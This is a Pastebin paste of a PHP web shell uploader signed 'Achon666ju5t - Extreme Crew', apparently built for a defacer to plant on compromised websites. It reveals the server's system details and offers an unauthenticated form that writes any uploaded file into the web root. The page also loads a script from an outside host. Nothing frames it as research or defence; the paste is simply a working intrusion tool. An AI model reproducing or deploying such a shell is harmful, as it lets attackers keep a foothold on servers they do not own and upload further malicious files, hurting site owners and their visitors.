Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html><title>Achon666ju5t </title>
- <script src="http://e-mete.com/js/kdsnow.js"></script> <style> body{ background-image: url(); background-repeat: no-repeat; background-attachment: fixed; background-position: top; background-color:#000000; position: relative; background-size:100% 100vh; } .logo { width: 300px; height: 300px; margin: 0 auto; margin-top: 50px; -webkit-filter: drop-shadow(0px 0px 7px #0080FF); filter: drop-shadow(0px 0px 7px #0080FF); } .logo:hover{ width: 300px; height: 300px; -webkit-filter: drop-shadow(0px 0px 10px #0080FF); opacity:0.4; filter:alpha(opacity=40); transition: opacity .2s ease-out; -moz-transition: opacity .2s ease-out; -webkit-transition: opacity .2s ease-out; -o-transition: opacity .2s ease-out; }</style>
- <table width="100%" height="100%"><td align=center>
- <br><table width="100%" height="100%"><td align=center><img src="https://lh4.googleusercontent.com/-vRbahBaV4GA/VGiPnhH1PqI/AAAAAAAAABw/pYik-TNuvFU/w810-h587-no/diev4owl.jpg"</img><br>
- <font color=cyan>
- <?php
- echo "Uploader By Achon666ju5t - Extreme Crew<br>";
- echo "<b>".php_uname()."</b><br>";
- echo "<form method='post' enctype='multipart/form-data'>
- <input type='file' name='just_file'>
- <input type='submit' name='upload' value='hajar goblok!!!'>
- </form>";
- $root = $_SERVER['DOCUMENT_ROOT'];
- $files = $_FILES['just_file']['name'];
- $dest = $root.'/'.$files;
- if(isset($_POST['upload'])) {
- if(is_writable($root)) {
- if(@copy($_FILES['just_file']['tmp_name'], $dest)) {
- $web = "http://".$_SERVER['HTTP_HOST']."/";
- echo "sukses upload -> <a href='$web$files' target='_blank'><b><u>$web/$files</u></b></a>";
- } else {
- echo "gagal upload di document root.";
- }
- } else {
- if(@copy($_FILES['just_file']['tmp_name'], $files)) {
- echo " upload <b>$files</b> di folder ini";
- } else {
- echo "gagal upload";
- }
- }
- }
- ?>
- </font></table></td></html>
Add Comment
Please, Sign In to add comment